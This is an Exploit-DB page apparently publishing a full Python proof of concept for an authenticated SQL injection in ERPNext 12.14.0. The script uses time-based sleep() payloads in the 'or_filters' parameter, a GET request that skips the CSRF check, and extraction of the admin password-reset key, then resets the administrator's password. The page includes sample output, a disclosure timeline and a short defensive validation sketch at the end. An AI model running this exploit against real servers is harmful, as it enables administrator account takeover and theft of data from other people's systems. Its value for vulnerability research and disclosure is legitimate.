ERPNext 12.14.0 – SQL Injection (Authenticated)

  • Author: Hodorsec
    Date: 2021-01-22
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/49464/
  • # Exploit Title: ERPNext 12.14.0 - SQL Injection (Authenticated)
    # Date: 21-01-21
    # Exploit Author: Hodorsec
    # Vendor Homepage: http://erpnext.org
    # Software Link: https://erpnext.org/download
    # Version: 12.14.0
    # Tested on: Ubuntu 18.04
    
    #!/usr/bin/python3
    
    # AUTHENTICATED SQL INJECTION VULNERABILITY
    # In short:
    # Found a SQL injection that is exploitable when authenticated as a low-privileged user, because the parameters "or_filters" and "filters" are not sanitized sufficiently. Although the code applies several sanitization and blacklist checks to other parameters, these two parameters aren't checked. This allows, for example, retrieving the admin reset token and resetting the admin account with a new password, as shown in the PoC.
    #
    # Longer story:
    # Via the "frappe.model.db_query.get_list" CMD method, it's possible to abuse the "or_filters" parameter to exploit a blind time-based SQL injection by passing an array/list of the form '["{QUERY}"]', where {QUERY} is any unfiltered SQL query.
    # The "or_filters" parameter is used as part of the SELECT query, along with the parameters "fields", "order_by", "group_by" and "limit". When a subselect is entered in the "or_filters" or "filters" parameter, no check is made for blacklisted words.
    # Initially, the requests were performed using the HTTP POST method, which checks for a CSRF token. However, when the request is converted to an HTTP GET, the CSRF token is neither required nor checked.
    # Test environment:
    # Tested against the latest development OVA v12 and updated using 'bench update', which leads to Frappe / ERPNext version v12.14.0.
    # Cause:
    # In "apps/frappe/frappe/model/db_query.py" the HTTP parameters "filters" and "or_filters" aren't being sanitized sufficiently.
    
    # STEPS NOT INCLUDED IN SCRIPT DUE TO MAILSERVER DEPENDENCY
    # 1. Create account
    # 1.a. Use update-password link for created user received via mail
    # STEPS INCLUDED IN SCRIPT
    # 1. Login using existing low-privileged account
    # 2. Use SQL Injection vulnerability in "frappe/frappe/model/db_query/get_list" function, which does not sanitize the parameters "filters" and "or_filters" sufficiently
    # 3. Retrieve reset key for admin user
    # 4. Reset admin account using given password
    
    # DEMONSTRATION
    # $ python3 poc_erpnext_12.14.0_auth_sqli_v1.0.py hodorhodor@nowhere.local passpass1234@ admin password123411111 http://192.168.252.8/ 2
    # [*] Got an authenticated session, continue to perform SQL injection...
    # [*] Retrieving 1 row of data using username 'admin' column 'name' and 'tabUser' as table...
    # admin@nowhere.local
    # [*] Retrieved value 'admin@nowhere.local' for username 'admin' column 'name' in row 1
    # [*] Sent reset request for 'admin@nowhere.local
    # [*] Retrieving 1 row of data using username 'admin' column 'reset_password_key' and 'tabUser' as table...
    # xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX
    # [*] Retrieved value 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX' for username 'admin' column 'reset_password_key' in row 1
    # [+] Retrieved email 'admin@nowhere.local' and reset key 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX'
    # [+} RESETTED ACCOUNT 'admin@nowhere.local' WITH NEW PASSWORD 'password123=411111!
    # 
    # [+] Done!
    
    import requests
    import urllib3
    import os
    import sys
    import re
    
    # Optionally, use a proxy
    # proxy = "http://<user>:<pass>@<proxy>:<port>"
    proxy = ""
    os.environ['http_proxy'] = proxy
    os.environ['HTTP_PROXY'] = proxy
    os.environ['https_proxy'] = proxy
    os.environ['HTTPS_PROXY'] = proxy
    
    # Disable cert warnings
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    # Set timeout
    timeout = 30
    
    # Injection prefix and suffix
    inj_prefix = "[\"select(sleep("
    inj_suffix = "))))\"]"
    
    # Decimal begin and end
    dec_begin = 48
    dec_end = 57
    
    # ASCII char begin and end
    ascii_begin = 32
    ascii_end = 126
    
    # Handle CTRL-C
    def keyboard_interrupt():
        """Handles keyboardinterrupt exceptions"""
        print("\n\n[*] User requested an interrupt, exiting...")
        exit(0)
    
    # Custom headers
    def http_headers():
        headers = {
            'User-Agent': "Mozilla",
        }
        return headers
    
    # Get an authenticated session
    
    def get_session(url,headers,email,password):
        data = {'cmd':'login',
                'usr':email,
                'pwd':password,
                'device':'desktop'}
        session = requests.session()
        r = session.post(url,headers=headers,data=data,timeout=timeout,
                         allow_redirects=True,verify=False)
        if "full_name" in r.text:
            return session
        else:
            print("[!] Unable to get an authenticated session, check credentials...")
            exit(-1)
    
    # Perform the SQLi call for injection
    def sqli(url,session,headers,inj_str,sleep):
        comment_inj_str = re.sub(" ","+",inj_str)
        inj_params = {'cmd':'frappe.model.db_query.get_list',
                      'filters':'["idx=1"]',
                      'or_filters':inj_str,
                      'fields':'idx',
                      'doctype':'Report',
                      'order_by':'idx',
                      'group_by':'idx'}

        # inj_params[param] = comment_inj_str
        inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_params.items())

        # Do GET
        r = session.get(url,params=inj_params,headers=headers,timeout=timeout,verify=False)
        res = r.elapsed.total_seconds()
        if res >= sleep:
            return True
        elif res < sleep:
            return False
        else:
            print("[!] Something went wrong checking responses. Check responses manually. Exiting.")
            exit(-1)
    
    # Loop through positions and characters
    def get_data(url,session,headers,prefix,suffix,row,column,table,username,sleep):
        extracted = ""
        max_pos_len = 35
        # Loop through length of string
        # Not very efficient, should use a guessing algorithm
        for pos in range(1,max_pos_len):
            # Test if current pos does have any valid value. If not, break
            direction = ">"
            inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix + suffix
            if not sqli(url,session,headers,inj_str,sleep):
                break
            # Loop through ASCII printable characters
            direction = "="
            for guess in range(ascii_begin,ascii_end+1):
                extracted_char = chr(guess)
                inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix + suffix
                if sqli(url,session,headers,inj_str,sleep):
                    extracted += chr(guess)
                    print(extracted_char,end='',flush=True)
                    break
        return extracted
    
    
    def forgot_password(url,headers,sqli_email):
        data = {'cmd':'frappe.core.doctype.user.user.reset_password',
                'user':sqli_email}
        r = requests.post(url,headers=headers,data=data,verify=False,allow_redirects=False,timeout=timeout)
        if "Password reset instructions have been sent to your email" in r.text:
            return r
    
    def reset_account(url,headers,sqli_email,sqli_reset_key,new_password):
        data = {'key':sqli_reset_key,
                'old_password':'',
                'new_password':new_password,
                'logout_all_sessions':'0',
                'cmd':'frappe.core.doctype.user.user.update_password'}
        r = requests.post(url,headers=headers,data=data,verify=False,allow_redirects=False,timeout=timeout)
        if r.status_code == 200:
            return r
    
    # Main
    def main(argv):
        if len(sys.argv) == 7:
            email = sys.argv[1]
            password = sys.argv[2]
            username = sys.argv[3]
            new_password = sys.argv[4]
            url = sys.argv[5]
            sleep = int(sys.argv[6])
        else:
            print("[*] Usage: " + sys.argv[0] + " <email_login> <passw_login> <username_to_reset> <new_password> <url> <sleep_in_seconds>")
            print("[*] Example: " + sys.argv[0] + " hodorhodor@nowhere.local passpass1234@ admin password1234@ http://192.168.252.8/ 2\n")
            exit(0)

        # Random headers
        headers = http_headers()

        # Sleep divide by 2 due to timing caused by specific DBMS query
        sleep = sleep / 2

        # Optional prefix / suffix
        prefix = ""
        suffix = ""

        # Tables / columns / values
        table = 'tabUser'
        columns = ['name','reset_password_key']
        sqli_email = ""
        sqli_reset_key = ""

        # Rows
        rows = 1

        # Do stuff
        try:
            # Get an authenticated session
            session = get_session(url,headers,email,password)
            if session:
                print("[*] Got an authenticated session, continue to perform SQL injection...")

            # Getting values for found rows in specified columns
            for column in columns:
                print("[*] Retrieving " + str(rows) + " row of data using username '" + username + "' column '" + column + "' and '" + table + "' as table...")
                for row in range(0,rows):
                    retrieved = get_data(url,session,headers,prefix,suffix,row,column,table,username,sleep)
                    print("\n[*] Retrieved value '" + retrieved + "' for username '" + username + "' column '" + column + "' in row " + str(row+1))
                    if column == 'name':
                        sqli_email = retrieved
                        # Generate a reset token in database
                        if forgot_password(url,headers,sqli_email):
                            print("[*] Sent reset request for '" + sqli_email + "'")
                        else:
                            print("[!] Something went wrong sending a reset request, check requests or listening mail server...")
                            exit(-1)
                    elif column == 'reset_password_key':
                        sqli_reset_key = retrieved

            # Print retrieved values
            print("[+] Retrieved email '" + sqli_email + "' and reset key '" + sqli_reset_key + "'")

            # Reset the desired account
            if reset_account(url,headers,sqli_email,sqli_reset_key,new_password):
                print("[+} RESETTED ACCOUNT '" + sqli_email + "' WITH NEW PASSWORD '" + new_password + "'")
            else:
                print("[!] Something went wrong when attempting to reset account, check requests: perhaps password not complex enough?")
                exit(-1)

            # Done
            print("\n[+] Done!\n")
        except requests.exceptions.Timeout:
            print("[!] Timeout error\n")
            exit(-1)
        except requests.exceptions.TooManyRedirects:
            print("[!] Too many redirects\n")
            exit(-1)
        except requests.exceptions.ConnectionError:
            print("[!] Not able to connect to URL\n")
            exit(-1)
        # HTTPError is a subclass of RequestException, so it must be handled first
        except requests.exceptions.HTTPError as e:
            print("[!] Failed with error code - " + str(e.response.status_code) + "\n")
            exit(-1)
        except requests.exceptions.RequestException as e:
            print("[!] " + str(e))
            exit(-1)
        except KeyboardInterrupt:
            keyboard_interrupt()
            exit(-1)
    
    # If we were called as a program, go execute the main function.
    if __name__ == "__main__":
        main(sys.argv[1:])
     
    # Timeline:
    # 22-12-20: Sent initial description and PoC via https://erpnext.com/security
    # 08-01-21: No reply nor response received, sent reminder via same form. Sent Twitter notifications.
    # 21-01-21: No response received, public disclosure
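
    The "Cause" note above attributes the issue to "filters" and "or_filters" reaching the query without sufficient sanitization. As a rough illustration of the defensive side, the sketch below rejects raw string filters such as '["idx=1"]' and only accepts structured [field, operator, value] entries, passing values as bind parameters. It is not taken from Frappe and is not the vendor's fix: the names validate_filters, build_where, ALLOWED_OPERATORS and FIELDNAME_RE are hypothetical, and the operator allow-list is an assumption.

    ```python
    import re

    # Hypothetical allow-lists for this sketch; not taken from Frappe's code base.
    ALLOWED_OPERATORS = {"=", "!=", "<", ">", "<=", ">=", "like", "not like"}
    FIELDNAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


    def validate_filters(filters):
        """Return normalized (field, operator, value) tuples or raise ValueError."""
        if not isinstance(filters, (list, tuple)):
            raise ValueError("filters must be a list")
        checked = []
        for entry in filters:
            # Raw strings such as "idx=1" or "select(sleep(1))" are rejected outright.
            if isinstance(entry, str) or not isinstance(entry, (list, tuple)) or len(entry) != 3:
                raise ValueError("each filter must be [field, operator, value]")
            field, operator, value = entry
            if not isinstance(field, str) or not FIELDNAME_RE.match(field):
                raise ValueError("invalid field name")
            if not isinstance(operator, str) or operator.lower() not in ALLOWED_OPERATORS:
                raise ValueError("operator not allowed")
            if not isinstance(value, (str, int, float)):
                raise ValueError("unsupported value type")
            checked.append((field, operator.lower(), value))
        return checked


    def build_where(filters, joiner="OR"):
        """Build a WHERE fragment whose values travel as bind parameters."""
        if joiner not in ("AND", "OR"):
            raise ValueError("joiner must be AND or OR")
        clauses, params = [], []
        for field, operator, value in validate_filters(filters):
            # Only the validated identifier and operator are interpolated;
            # the value is left as a %s placeholder for the database driver.
            clauses.append("`%s` %s %%s" % (field, operator))
            params.append(value)
        return (" %s " % joiner).join(clauses), params
    ```

    With this shape, build_where([["idx", "=", 1]]) yields a fragment with a placeholder plus a separate parameter list, while a string entry like the one used in the PoC raises ValueError before any SQL is assembled.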